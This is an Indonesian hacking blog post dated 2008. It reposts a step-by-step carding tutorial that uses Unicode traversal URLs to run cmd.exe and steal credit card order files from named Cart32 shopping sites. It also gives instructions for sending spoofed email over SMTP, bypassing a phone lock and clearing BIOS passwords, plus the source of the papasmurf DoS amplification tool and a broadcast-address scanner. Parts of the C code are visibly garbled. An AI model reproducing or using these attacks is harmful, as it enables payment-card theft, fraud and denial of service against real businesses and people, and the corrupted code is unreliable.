Open Source

Untuk seluruh software yang bersifat Open Source tidak akan tenggelam oleh waktu dikarenakan banyak yang mendukung program tersebut dan software tersebut tidak kalah bersaing dengan software berbayar lainnya.

Certified

Mengambil sertifikasi semata-mata bukan untuk menjadi tenar atau sombong, tapi untuk mengetahui apakah anda mampu mengemban tanggung jawab secara moral terhadap apa yang anda telah pelajari dan bagaimana memberikan ilmu tersebut kepada orang lain tanpa pamrih.

Operating System Pentest

Sistem operasi Bactrack, Kali Linux, dll memang sangat memanjakan para Pentester dalam melaksanakan tugasnya sesuai dengan prosedur yang berlaku. Di OS tersebut disediakan beberapa tools menarik seperti untuk memperoleh information gathering, vulnerability assesment, exploit, dll.

Sherlock Holmes

Film detektif yang satu ini pasti disukai oleh beberapa rekan IT dikarenakan proses jalan ceritanya ketika memecahkan sebuah kasus tidak monoton dan memerlukan logika berpikir yang diluar kebiasaan. Daya hayal harus tinggi ketika ingin menonton film ini.

Forensic

Kegiatan forensic bidang IT sangat membutuhkan tingkat pemahaman yang tinggi akan suatu kasus yang ditangani. Tim yang menangani forensic harus bisa membaca jalan pikiran si Attacker seperti apa jika melakukan serangan. Biasanya Attacker lebih maju selangkah dibanding dengan tim pemburunya.

Sabtu, 15 November 2008

Tutorial PHP,Gambas,Kumpulan Virus

Tugas Grafkomp Pak toyib n Pak adang

Pencurian Credit Card Pada Web Site Cart32

Jasakom - Pencurian nomor kartu kredit di internet telah menjadi makanan sehari-hari komunitas hacker baik di indonesia maupun di dunia.
Salah satu cara yang paling banyak di pakai adalah melalui kelemahan dari web site yang menyediakan pembayaran online dengan credit card.
Salah satu program yang sering dipakai oleh web site yang memberikan layanan pembayaran online ini adalah Cart32 yang paling banyak pula di bobol oleh hacker untuk mendapatkan kartu kredit.

TUTORIAL I : Cart32 v3.5a

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a
Langkah 2: Masuk ke website Cart32.exe
http://target/login/unicode/cart32.exe
(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)
Langkah 3: Setelah kamu masuk kesana, akan diperlihatkan tampilan seperti dibawah ini :

========================================
Cart32 v3.5a Shopping Cart System for Windows
http://www.cart32.com/
Registered to Greymane Connections
License: Unlimited clients
©1996-2001 McMurtrey/Whitaker & Associates, Inc.
Build 714
========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi berikut di
akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) HANYA DIGUNAKAN KADANG2!

(contoh : http://www.connectionsmall.com/scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af.. /winnt/system32/cmd.exe?/c+dir+c:\)

Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi sehingga sekarang kamu dapat melihat seperti : http://www.connectionsmall.com /scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af../ winnt/system32/cmd.exe?/c+ dir+c:\progra~1\ mwainc\cart32\
Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/ scripts /.%e0%80%af../..%e0%80%af.. /..%e0%80%af../ winnt/system32 /cmd.exe?/c+type+ c:\progra~1\ mwainc\cart32\ 2814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali cc's seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)
procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti
*c+dir+c:\* ke *c+type+c:\*


TUTORIAL II : Cart32 v3.5a

Target: http://www.partybows.com
1. Ke http://www.partybows.com
2. Klik http://www.partybows.com/seasonal.htm
3. Isi Quantity= 1
Pokoknya kayak lu pura2x beli dan klik order
4. Maka akan kesini jadinya :
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Ubah menjadi
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure Error Number = 5
Click Here For Possible Solutions
etc.
6. Cari log order-nya
Cart32 Setup Info and Directory
Mail Server = mail.axion.net
Section=Main
AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
Jadi partybows-orders.txt
7. Sehingga akhirnya : http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt



TUTORIAL III : Cart32 v3.5a

search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.exe/
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe/
-/cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist and erase the rest a menu will come up with a submit box click go it will list ALL clients and their passwords passwords will be encrypted after decrypting the password, go to wherever the c32web.exe file is thats the instructions with exploits what that channel we were just in called!


Bye.. .




:: JoeGoeL ::.



Tutorial Hacking Cart32 v3.5a - Exploit
Author JoeGoeL aka Pred4t0r
Published JasaKom (English Version)
Dedicated Hiddenline & Medanhacking Crew :
#hiddenline - #medanhacking - on DALNET
Contact JoeGoeL@linuxmail.org
WebSite http://private.localbox.net (staff only - no link) :
http://published.localbox.net (free exploits - k00lz :
http://restriction.localbox.net (staff only - no link) :
Greetz r3v0lt,phayzer, the-p0, hellGoD, zeal0th,c4rnifor,etc! :
Creditz GDS, Hantu_BJM, ChriztianZ, BlackApriL, Phardera, Kebam, etc

Peringatan :
Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk melindungi diri kamu sendiri. Tutorial ini ditulis berdasarkan pengalaman gua selama menjelajahi dunia maya. Dikumpulkan dari berbagai tutorial dan hasil ngobrol di #. Dan tulisan ini di peruntukkan untuk para newbies. Buat yang udah para CARDER tulen, kalo nich tutorial banyak kesalahan gua minta di kritik OK!

Kirim Email Palsu

Ini tuh cara paling gampang ngirim email palsu ke orang lain tanpa
kita punya akses ke mesin yang bersangkutan.

Buat kirim e-mail palsu:
1. Cari domain yang mau digunakan. Misalkan nama servernya: www.sasaran.com
2. Buka telnet ke SMTP port di domain tsb.
Terlebih dulu di port scanning aja untuk mengetahui apakah server sasaran ada SMTP nya.
Tapi, mending nebak aja dulu tuh server ada port SMTP atau nggak,
takutnya si server udah masang portsentry.
Kalau udah nebak tapi nggak berhasil, mending di port scanning aja.
Anda bisa menggunakan tools nmap.

#nmap www.sasaran.com

Jika port SMTP kebuka telnet aja ke server tersebut.

#telnet www.sasaran.com 25

Kalau udah masuk, ikuti instruksi dibawah



3. MAIL FROM:coolstuff@sasaran.com
(or net or id or whatever, sesuai nama server sasaran)
4. RCPT TO:admin@someplace.com
5. DATA
6. Ketik isi email disini. Jika mau selesai, ketik titik (.) di line baru
7. QUIT

Hacking Telepon yg Dikunci

Akhir- akhir ini pesawat telphone menjadi salah satu bentuk kebutuhan kita untuk berkomunikasi, apa lagi saat kita ada keperluan mendadak untuk menghubungi kerabat kita.

Jika suatu saat kita inggin menggunakan pesawat telephone, namun pesawat telephonenya terkunci dan kuncinya di sembunyikan , jangan khawatir karena kita masih bisa menggunakan pesawat telephonenya.

Saya mau bagi bagi sedikit ilmu , bagaimanan caranya kita bisa menggunakan telphone walau telephonenya sedang terkunci ( lock ).

1. Periksa dulu bagian belakang pesawat telphone kamu. jika terbuka kuncinya, pakek aja. jika dalam keaadan terkunci, ikutin langkah selanjutnya.
2. Angkat gagang telephonenya.
3. Lalu kamu lihat tombol dialnya yang biasa untuk memutuskan telephonnya
4. kamu tekan tekan tuh dialnya dengan cepat .

petunjuk nomor:
" 1" ( 1 kali ) , "2" ( 2 kali ) ," 3"( tiga kali ) dst......................s/d "9"( sembilan kali )
untuk angka " 0 " ( sepuluh kali ).

Contoh: " 7359463 " ( tujuh kali, tiga kali , lima kali, sembilan kali, empat kali, enam kali, tiga kali )

SELAMAT MENCOBA........!!!!!!!
Efek sampingnya ini hanya mengaktifkan pesawat telphone sedangkan pulsa telephone tetap berjalan selama anda berbicara.

Virus Smurf.c

/*
* (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
*
* A year ago today I made what remains the questionable decision of
* releasing my program 'smurf', a program which uses broadcast "amplifiers"
* to turn an icmp flood into an icmp holocaust, into the hands of packet
* monkeys, script kiddies and all round clueless idiots alike. Nine months
* following, a second program 'fraggle', smurfs udp cousin, was introducted
* into their Denial of Service orgy. This brings us to today, July 28,
* 1998, one year after my first "mistake". The result, proof that history
* does repeat itself and a hybrid of the original programs.
*
* First may I say that I in no way take credit for "discovering" this.
* There is no doubt in my mind that this idea was invisioned long before
* I was even sperm -- I merely decided to do something about it. Secondly,
* if you want to hold me personally responsible for turning the internet
* into a larger sesspool of crap than it already is, then may I take this
* opportunity to deliver to you a message of the utmost importance -- "Fuck
* you". If I didn't write it, someone else would have.
*
* I must admit that there really is no security value for me releasing this
* new version. In fact, my goals for the version are quite silly. First,
* I didn't like the way my old code looked, it was ugly to look at and it
* did some stupid unoptimized things. Second, it's smurfs one year
* birthday -- Since I highly doubt anyone would have bought it a cake, I
* thought I would do something "special" to commemorate the day.
*
* Hmm, I am starting to see why I am known for my headers (wage eats
* playdough!).
*
* Well, I guess this wouldn't be the same if I did not include some sort
* of shoutouts, so here goes...
*
* A hearty handshake to...
*
* o MSofty, pbug, Kain -- No matter which path each of you decides to
* take in the future, I will always look back upon these days as one
* of the most enjoyable, memorable and thought-provoking experiences
* of my life. I have nothing but the highest degree of respect for
* each of you, and I value your friendship immensely. Here's to
* living, learning and laughing -- Cheers gentlemen. --Dan
* o Hi JoJo!
* o morbid and his grandam barbiegirl gino styles, yo.
* o The old #havok crew.
* o Pharos,silph,chris@unix.org,Viola,Vonne,Dianora,fyber,silitek,
* brightmn,Craig Huegen,Dakal,Col_Rebel,Rick the Temp,jenni`,Paige,
* RedFemme,nici,everlast,and everyone else I know and love.
*
* A hearty enema using 15.0mol/L HCl to...
*
* o #Conflict. Perhaps you are just my scapegoat of agression, but you
* all really need to stop flooding efnet servers/taking over irc
* channels/mass owning networks running old qpoppers and get a
* fucking life.
* o BR. It wouldn't be the same without you in here, but to be honest
* you really aren't worth the space in the already way-to-bloated
* header, nor the creative energy of me coming up with an intricate
* bash that you will never understand anyway. Shrug, hatred disguises
* itself as apathy with time.
*
* I feel like I'm writing a fucking essay here...
*
* To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
* or just
* "gcc -o smurf5 papasmurf.c" if your BSDish.
*
* Old linux kernels won't have BSD header support, so this may not compile.
* If you wish a linux-only version, do it yourself, or mail
* tfreak@jaded.net, and I might lend you mine.
*
* And most importantly, please don't abuse this. If you are going to do
* anything with this code, learn from it.
*
* I remain,
*
* TFreak.
*
*/

/* End of Hideously Long Header */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef LINUX
#define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */
#ifndef _USE_BSD
#define _USE_BSD
#endif
#endif
#include
#include
#include

#ifdef LINUX
#define FIX(n) htons(n)
#else
#define FIX(n) (n)
#endif

struct smurf_t
{
struct sockaddr_in sin; /* socket prot structure */
int s; /* socket */
int udp, icmp; /* icmp, udp booleans */
int rnd; /* Random dst port boolean */
int psize; /* packet size */
int num; /* number of packets to send */
int delay; /* delay between (in ms) */
u_short dstport[25+1]; /* dest port array (udp) */
u_short srcport; /* source port (udp) */
char *padding; /* junk data */
};

/* function prototypes */
void usage (char *);
u_long resolve (char *);
void getports (struct smurf_t *, char *);
void smurficmp (struct smurf_t *, u_long);
void smurfudp (struct smurf_t *, u_long, int);
u_short in_chksum (u_short *, int);


int
main (int argc, char *argv[])
{
struct smurf_t sm;
struct stat st;
u_long bcast[1024];
char buf[32];
int c, fd, n, cycle, num = 0, on = 1;
FILE *bcastfile;

/* shameless self promotion banner */
fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");

if (argc < icmp =" 1;" psize =" 64;" num =" 0;" delay =" 10000;" sin_port =" htons(0);" sin_family =" AF_INET;" srcport =" 0;" s_addr =" resolve(argv[1]);" bcastfile =" fopen(argv[2]," optind =" 3;" c =" getopt(argc," rnd =" 1;" rnd =" 1;" srcport =" 0;" num =" atoi(optarg);" delay =" atoi(optarg);" icmp =" 1;" icmp =" 0;" udp =" 1;" icmp =" 1;" udp =" 1;" srcport =" (u_short)" psize =" atoi(optarg);" fd =" open(optarg," padding =" (char" psize =" st.st_size;" padding =" (char" s =" socket(AF_INET," p =" buf," valid =" 1;" valid =" 0;" num ="=" n =" 0," cycle =" 0;" x =" 0;" 50 ="=" cycle =" (cycle" host=""> [options]\n"
"\n"
"Options\n"
"-p: Comma separated list of dest ports (default 7)\n"
"-r: Use random dest ports\n"
"-R: Use random src/dest ports\n"
"-s: Source port (0 for random (default))\n"
"-P: Protocols to use. Either icmp, udp or both\n"
"-S: Packet size in bytes (default 64)\n"
"-f: Filename containg packet data (not needed)\n"
"-n: Num of packets to send (0 is continuous (default))\n"
"-d: Delay inbetween packets (in ms) (default 10000)\n"
"\n", s);
exit(-1);
}


u_long
resolve (char *host)
{
struct in_addr in;
struct hostent *he;

/* try ip first */
if ((in.s_addr = inet_addr(host)) == -1)
{
/* nope, try it as a fqdn */
if ((he = gethostbyname(host)) == NULL)
{
/* can't resolve, bye. */
herror("Resolving victim host");
exit(-1);
}

memcpy( (caddr_t) &in, he->h_addr, he->h_length);
}

return(in.s_addr);
}


void
getports (struct smurf_t *sm, char *p)
{
char tmpbuf[16];
int n, i;

for (n = 0, i = 0; (n < p ="=">dstport[n] = (u_short) atoi(tmpbuf);
n++; i = -1;
continue;
}

tmpbuf[i] = *p;
}
tmpbuf[i] = '\0';
sm->dstport[n] = (u_short) atoi(tmpbuf);
sm->dstport[n + 1] = 0;
}


void
smurficmp (struct smurf_t *sm, u_long dst)
{
struct ip *ip;
struct icmp *icmp;
char *packet;

int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;

packet = malloc(pktsize);
ip = (struct ip *) packet;
icmp = (struct icmp *) (packet + sizeof(struct ip));

memset(packet, 0, pktsize);

/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_ICMP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;

/* fill in ICMP header */
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO <<>s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}

free(packet); /* free willy! */
}


void
smurfudp (struct smurf_t *sm, u_long dst, int n)
{
struct ip *ip;
struct udphdr *udp;
char *packet, *data;

int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;

packet = (char *) malloc(pktsize);
ip = (struct ip *) packet;
udp = (struct udphdr *) (packet + sizeof(struct ip));
data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));

memset(packet, 0, pktsize);
if (*sm->padding)
memcpy((char *)data, sm->padding, sm->psize);

/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;

/* fill in UDP header */
if (sm->srcport) udp->uh_sport = htons(sm->srcport);
else udp->uh_sport = htons(rand());
if (sm->rnd) udp->uh_dport = htons(rand());
else udp->uh_dport = htons(sm->dstport[n]);
udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
// udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));

/* send it on its way */
if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}

free(packet); /* free willy! */
}


u_short
in_chksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}

if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}

sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

/* EOF */


---- selsai -----

berikut ini adalah cara mencari ip broadcast menggunakan tools yang sudah tidak asing lagi
yaitu
NMAP :)

commandnya : nmap -n -sP -PI -o smurf.log 'xxx.12.*.0,63,64,127,128,191,192,255'

catatan : hanya *.255 yang bisa digunakan untuk smurf attack file broadcast tersimpan di
smurf.log terus bisa dipilih dan di bikin file baru buat input di papasmurf.c

ini file broadscan.c bisa juga dipake buat nyari broadcast server

-- tarik maaaanggg ----

/* Broadscan v 0.31
DUP Broadcast IP scanner
by Vacuum http://www.technotronic.com
09-03-98
This is a very lame scanner written to
stop people from asking how to find
DUP broadcast ip addresses. Use this in
conjunction with smurf, fraggle,
or papasmurf. DoS kiddies enjoy!
*/

#include
#include

#define DEBUG 1

FILE *stream;

void pingz0r(int first, int second, int start, int end)
{
int counter,flag;
FILE *stream;
char tempstring[2048];
char parse[2048];

for (counter=start; counter /dev/null",first,
second, counter);
stream=popen(tempstring,"r");
while (fgets(parse,sizeof(parse),stream)!=NULL)
{
if (DEBUG) printf("Results:%s",parse);
if (strstr(parse,"DUP"))
{
flag=1;
fclose(stream);
break;
}
}
if (flag==1)
stream=fopen("broadcast.txt", "a");
fprintf(stream, "%d.%d.%d.255\n",first,second,counter);
fclose( stream);
}
}

main(int argc, char *argv[])

{
int first,second;

if (argc!=3)
{
printf("\nusage : %s \n\n",argv[0]);
exit(0);
}

first=atoi(argv[1]);
second=atoi(argv[2]);

if (first==127)
{
printf("%d is a localhost. You have no clue or are trying to break this program",first);
exit(0);
}
if (first>254 || first <0)>",first);
exit(0);
}
if (second>254 || second<0)>",second);
exit(0);
}

printf("Scanning for DUP broadcast ip addresses\n");
printf("Results output to broadcast.txt\n");

if (fork()!=0)
pingz0r(first,second,0,128);
else
pingz0r(first,second,128,255);

}

Jebol Bios

Cara Jebol Bios
Tips ini saya dapatkan dari seorang teman beberapa tahun yang lalu. Mungkin ini bisa membantu rekans yang membutuhkan. Masuk ke mode DOS setelah muncul prompt DOS c:\> ketikkan DEBUG seperti ini

c:\>DEBUG

Untuk selanjutnya ketikkan

o 70 2e
o 71 ff
Q

Pada layar monitor akan terlihat seperti dibawah ini c:\>DEBUG

-o 70 2e
-o 71 ff
-Q

setelah mengetikkan Q anda akan keluar dari debug yang menandakan anda sudah selesai. Selanjutnya restart komputer anda, tekan DEL dan SELAMAT anda sudah bisa masuk ke BIOS.